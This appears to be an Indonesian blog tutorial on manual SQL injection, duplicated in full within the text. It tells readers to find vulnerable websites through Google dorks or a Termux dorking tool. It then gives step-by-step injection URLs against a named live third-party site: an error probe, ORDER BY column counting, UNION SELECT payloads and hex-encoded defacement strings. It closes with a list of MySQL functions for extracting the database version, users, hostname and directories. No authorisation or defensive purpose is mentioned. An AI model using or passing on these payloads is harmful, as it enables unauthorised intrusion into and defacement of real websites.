kamu harus tau tentang Sqli inject (dios)
Dios
Assallamualaikum Wr.Wb
dikesempatan kali ini saya akan membahas cara sqli manual (Dios) apasih fungsi dios ? berguna untuk
mencari database di web.
untuk melakukan sqli inject manual siapkan dulu bahan-bahan nya :
~ Dork
~ Termux
jika udah disiapkan semua bahan nya kita langsung eksekusi.
kalau ada yang bertanya apa gunannya termux disini ? gunannya untuk buat kalian yang malas cari web yang vuln dengan install ko-dork.
pertama kita ngedork dulu di google atau buat kalian yang malas download termux dan kita install tool ko-dork
jika sudah punya target lewati step diatas jika belom lakukan step diatas
disini saya sudah punya live target
http://www.coda.cc/product/product.php?id=4
untuk kalian yang tidak menggunakan ko-dork atau kalian yang udah menggunakan ko-dork tapi masih bimbang vuln ngak nya web tersebut bisa melakukan hal ini
tambah (') dibelakang link web ya
http://www.coda.cc/product/product.php?id=4(')
note : tanpa tanda buka kurung ()
jika ada tulisan error berarti vuln.
oke kita lanjut untuk ke order+by
http://www.coda.cc/product/product.php?id=4+order+by+1--+
angka yang berwarna merah bisa diganti sampai kita menemukan tulisan error di web
di web target saya
menemukan error di nomer 14
http://www.coda.cc/product/product.php?id=4+order+by+14--+
Jika udah melakukan order kita lakukan onion select
http://www.coda.cc/product/product.php?id=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13-++
kenapa saya ketik sampai nomer karna error saya berada di nomer begitu seterus nya
nanti akan menemukan nomer ajaib
seperti gambar dibawah ini
nomer ajaib ini berguna untuk memasukan inject,selain kita mencari database kita bisa buat mainan sqli inject dengan mengeprint gambar dan nama kalian apapun sesuai imajinasi kalian
disini nomer ajaib saya 2,4 dan 5
http://www.coda.cc/product/product.php?id=-4+onion+select+1,concat(link gambar" />Injek by Nama kalian),3,4,5,6,7,8,9,10,11,12,13--+
kode * ganti aja =
dan kalimat yg berwarna merah ganti sesuai selera anda
Nama kalian harus convet ke hex Disini
contoh
6b696c6c657220636c6f776e
Jangan lupa ditambah 0x
Menjadi
code di bawah ini bisa ditambahkan sesuai kebutuhan.
Function Output
@@version =Menampilkan Versi database
user() = Menampilkan Nama User database
@@hostname Menampilkan Hostname
@@tmpdir Menampilkan Direktori temp
@@datadir Menampilkan Direktori data
@@basedir Menampilkan Direktori base
database() Menampilkan Nama Database
schema() Menampilkan Database yang dipakai
session_user() Menampilkan Session User
UUID() Menampilkan System UUID Key
current_user() Menampilkan User Sekarang
system_user() Menampilkan System User Sekarang
@@GLOBAL.have_symlink Mengecek symlink aktif atau tidak
@@GLOBAL.have_ssl Mengecek apakah ada SSL atau tidak
sekian sampai jumpa lagi di artikel berikunya
Assallamualaikum Wr.Wb
dikesempatan kali ini saya akan membahas cara sqli manual (Dios) apasih fungsi dios ? berguna untuk
mencari database di web.
untuk melakukan sqli inject manual siapkan dulu bahan-bahan nya :
~ Dork
~ Termux
jika udah disiapkan semua bahan nya kita langsung eksekusi.
kalau ada yang bertanya apa gunannya termux disini ? gunannya untuk buat kalian yang malas cari web yang vuln dengan install ko-dork.
pertama kita ngedork dulu di google atau buat kalian yang malas download termux dan kita install tool ko-dork
jika sudah punya target lewati step diatas jika belom lakukan step diatas
disini saya sudah punya live target
http://www.coda.cc/product/product.php?id=4
untuk kalian yang tidak menggunakan ko-dork atau kalian yang udah menggunakan ko-dork tapi masih bimbang vuln ngak nya web tersebut bisa melakukan hal ini
tambah (') dibelakang link web ya
http://www.coda.cc/product/product.php?id=4(')
note : tanpa tanda buka kurung ()
jika ada tulisan error berarti vuln.
oke kita lanjut untuk ke order+by
http://www.coda.cc/product/product.php?id=4+order+by+1--+
angka yang berwarna merah bisa diganti sampai kita menemukan tulisan error di web
di web target saya
menemukan error di nomer 14
http://www.coda.cc/product/product.php?id=4+order+by+14--+
Jika udah melakukan order kita lakukan onion select
http://www.coda.cc/product/product.php?id=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13-++
kenapa saya ketik sampai nomer karna error saya berada di nomer begitu seterus nya
nanti akan menemukan nomer ajaib
seperti gambar dibawah ini
nomer ajaib ini berguna untuk memasukan inject,selain kita mencari database kita bisa buat mainan sqli inject dengan mengeprint gambar dan nama kalian apapun sesuai imajinasi kalian
disini nomer ajaib saya 2,4 dan 5
http://www.coda.cc/product/product.php?id=-4+onion+select+1,concat(link gambar" />Injek by Nama kalian),3,4,5,6,7,8,9,10,11,12,13--+
kode * ganti aja =
dan kalimat yg berwarna merah ganti sesuai selera anda
Nama kalian harus convet ke hex Disini
contoh
6b696c6c657220636c6f776e
Jangan lupa ditambah 0x
Menjadi
http://www.coda.cc/product/product.php?id=-4+union+select+1,2,concat(0x6b696c6c657220636c6f776e),4,5,6,7,8,9,10,11,12,13--+
Hasilnya akan seperti inicode di bawah ini bisa ditambahkan sesuai kebutuhan.
Function Output
@@version =Menampilkan Versi database
user() = Menampilkan Nama User database
@@hostname Menampilkan Hostname
@@tmpdir Menampilkan Direktori temp
@@datadir Menampilkan Direktori data
@@basedir Menampilkan Direktori base
database() Menampilkan Nama Database
schema() Menampilkan Database yang dipakai
session_user() Menampilkan Session User
UUID() Menampilkan System UUID Key
current_user() Menampilkan User Sekarang
system_user() Menampilkan System User Sekarang
@@GLOBAL.have_symlink Mengecek symlink aktif atau tidak
@@GLOBAL.have_ssl Mengecek apakah ada SSL atau tidak
sekian sampai jumpa lagi di artikel berikunya